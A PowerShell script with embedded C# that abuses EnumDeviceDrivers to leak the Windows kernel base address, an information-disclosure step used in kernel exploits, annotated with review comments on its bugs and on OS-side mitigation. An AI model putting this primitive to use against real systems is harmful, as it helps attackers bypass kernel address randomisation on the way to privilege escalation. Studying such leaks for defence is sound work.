Abuse EnumDeviceDrivers() to leak the location of the Windows NT Kernel
Add-Type -TypeDefinition @"
// ref: http://showlinkroom.me/2020/10/16/WindowKernelExploit01/
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

/// <summary>
/// P/Invoke surface used by the PowerShell function LeakBaseAddress below:
/// the psapi driver-enumeration export plus kernel32's GetLastError for
/// error reporting. System.Diagnostics and System.Security.Principal are
/// imported but not referenced by this class.
/// </summary>
public static class EVD2
{
    // NOTE(review): reading GetLastError through its own P/Invoke is not
    // guaranteed to return the error of the preceding EnumDeviceDrivers call
    // (the runtime may make Win32 calls in between). The usual pattern is
    // SetLastError = true on that import plus Marshal.GetLastWin32Error();
    // confirm if the reported error code matters.
    [DllImport("kernel32.dll")]
    public static extern uint GetLastError();

    // Wraps psapi's EnumDeviceDrivers(LPVOID *lpImageBase, DWORD cb, LPDWORD lpcbNeeded):
    //   ddAddresses    - receives one load address per driver, in the order the OS reports them
    //   arraySizeBytes - byte size the caller claims for ddAddresses (not validated here)
    //   bytesNeeded    - byte size required to hold every entry
    // NOTE(review): ArraySubType is U4 while the managed element type is UInt64
    // (8 bytes on the x64 build this targets); the declaration is kept exactly as
    // written — confirm it is intended.
    [DllImport("psapi")]
    public static extern bool EnumDeviceDrivers(
        [MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] UInt64[] ddAddresses,
        UInt32 arraySizeBytes,
        [MarshalAs(UnmanagedType.U4)] out UInt32 bytesNeeded
    );
}
"@
# Returns the first entry of the driver load-address list reported by
# EnumDeviceDrivers. Per the gist description this entry is expected to be
# the NT kernel image base; nothing in this script verifies that, so callers
# should treat the value as unverified.
# NOTE(review): this is an unprivileged kernel-address disclosure primitive;
# the mitigation is OS-side (newer Windows builds are reported to withhold
# kernel pointers from non-administrative callers), so on such systems the
# returned value may be zero or otherwise meaningless.
Function LeakBaseAddress(){
    # Probe call: no buffer and size 0, used only to populate $dwByte with the
    # byte count the API needs for the full list.
    $dwByte = 0
    $status=[bool] [EVD2]::EnumDeviceDrivers(0, 0, [ref]$dwByte)
    if(!$status){
        # echo (alias of Write-Output) inside a function writes to the pipeline,
        # so on failure this message becomes part of the function's output
        # together with the value returned below: the caller then receives an
        # array, not a single number. Execution also continues past this point.
        echo $("[*] Unable to enum device.... with error 0x{0:x}`n" -f [EVD2]::GetLastError())
    }
    # Casting 9 to [Uint64[]] yields a one-element array; PowerShell array
    # repetition (* 0x1000) expands it to 0x1000 entries, each initialised to 9.
    # Entries the API does not overwrite therefore keep the value 9.
    $ptrAddress = [Uint64[]](9)*0x1000
    # Second call fills the buffer. The size passed is $dwByte+10 from the
    # probe, not the actual byte length of $ptrAddress (0x1000 entries); nothing
    # checks that the former fits within the latter, and the returned $status
    # is not examined.
    $status=[bool] [EVD2]::EnumDeviceDrivers([UInt64[]]$ptrAddress, $dwByte+10, [ref]$dwByte)
    # echo $("Address is {0:x}" -f $ptrAddress[0])
    return $ptrAddress[0]
}
# Entry point: run the leak once and print the first reported driver address
# as hex. If LeakBaseAddress also emitted its failure message, $leakAddress is
# an array and the formatted line reflects that rather than a single value.
$leakAddress = LeakBaseAddress
Write-Output ("Address is {0:x}" -f $leakAddress)